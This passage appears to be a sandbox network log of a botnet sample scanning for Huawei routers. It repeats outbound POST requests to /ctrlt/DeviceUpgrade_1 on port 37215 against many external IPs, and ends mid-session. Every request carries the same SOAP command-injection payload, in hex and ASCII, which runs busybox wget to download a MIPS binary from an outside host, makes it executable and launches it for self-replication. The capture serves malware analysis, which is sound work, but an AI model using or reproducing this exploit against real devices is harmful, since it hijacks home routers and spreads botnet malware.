                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    72192.168.2.1441654157.185.35.8737215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.136584044 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.507260084 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    73192.168.2.14580085.96.24.6437215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.140722036 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.484842062 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    74192.168.2.1454936157.212.90.23637215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.144714117 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.550470114 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    75192.168.2.144744877.76.169.18437215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.144714117 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.550470114 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    76192.168.2.1454430157.227.252.6337215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.144714117 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.550470114 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    77192.168.2.1453562172.2.237.2237215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.144777060 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
